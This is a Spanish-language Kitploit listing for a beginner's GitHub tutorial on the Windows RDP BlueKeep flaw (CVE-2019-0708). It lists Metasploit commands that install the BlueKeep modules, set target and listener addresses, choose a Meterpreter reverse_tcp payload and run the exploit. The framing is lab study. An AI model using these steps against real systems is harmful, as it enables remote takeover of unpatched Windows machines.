Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-0708-Windows — Este artículo compartirá la vulnerabilidad del servicio de Escritorio remoto de Windows (CVE-2019-0708) y explicará en detalle dicha vulnerabilidad y las medidas de defensa. Siendo el autor un principiante en seguridad informática, comparte algunos tutoriales básicos de autoaprendizaje, principalmente notas en línea sobre herramientas de seguridad y operaciones prácticas, esperando que les gusten. Al mismo tiempo, espero que puedan practicar y progresar junto conmigo; más adelante profundizaré en el conocimiento de seguridad de redes y de sistemas y compartiré experimentos relacionados. En resumen, espero que esta serie de artículos sea de ayuda para los amigos del blog. Escribir no es fácil; expertos, si no les agrada, no critiquen, ¡gracias! | Kitploit
Herramientas/GitHubGitHub/eastmountyxz/cve-2019-0708-windows
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de PayloadsLabs y Práctica
GitHubeastmountyxz/cve-2019-0708-windows

CVE-2019-0708-Windows

Ver Repositorio
5214hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Este artículo compartirá la vulnerabilidad del servicio de Escritorio remoto de Windows (CVE-2019-0708) y explicará en detalle dicha vulnerabilidad y las medidas de defensa. Siendo el autor un principiante en seguridad informática, comparte algunos tutoriales básicos de autoaprendizaje, principalmente notas en línea sobre herramientas de seguridad y operaciones prácticas, esperando que les gusten. Al mismo tiempo, espero que puedan practicar y progresar junto conmigo; más adelante profundizaré en el conocimiento de seguridad de redes y de sistemas y compartiré experimentos relacionados. En resumen, espero que esta serie de artículos sea de ayuda para los amigos del blog. Escribir no es fácil; expertos, si no les agrada, no critiquen, ¡gracias!

Compartir

CVE-2019-0708-Windows

Este artículo compartirá la vulnerabilidad del servicio de escritorio remoto de Windows (CVE-2019-0708) y explicará en detalle dicha vulnerabilidad y sus medidas de defensa. Como principiante en seguridad cibernética, el autor comparte algunos tutoriales básicos de autoaprendizaje, principalmente notas en línea sobre herramientas de seguridad y prácticas operativas. Espero que les gusten. Además, espero que puedan operar y progresar junto a mí; en el futuro profundizaré en el conocimiento de la seguridad de redes y sistemas y compartiré experimentos relacionados. En resumen, espero que esta serie de artículos sea de ayuda para los amigos del blog. No es fácil escribir artículos, maestros, si no les gusta, no critiquen. ¡Gracias!


Blog correspondiente:
[Serie de autoaprendizaje de seguridad cibernética] 58. Reanálisis de CVE-2019-0708 y shell inverso de Metasploit en la explotación de vulnerabilidades de Windows
[Serie de autoaprendizaje de seguridad cibernética] 44. Reproducción y explicación detallada de la vulnerabilidad del servicio de escritorio remoto de Windows (CVE-2019-0708)


Comandos principales:

# 复制文件
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

# 开启工具
msfconsole
reload_all
search 0708

# 使用脚本
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# 查看信息
show options
show targets
info

# 设置监听地址、目标地址、反弹payload、目标类型
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3

# 运行脚本
run
exploit

# 设置带宽
Set GROOMSIZE 40

Referencias:
[1] https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
[2] https://github.com/n1xbyte/CVE-2019-0708

Descargar herramienta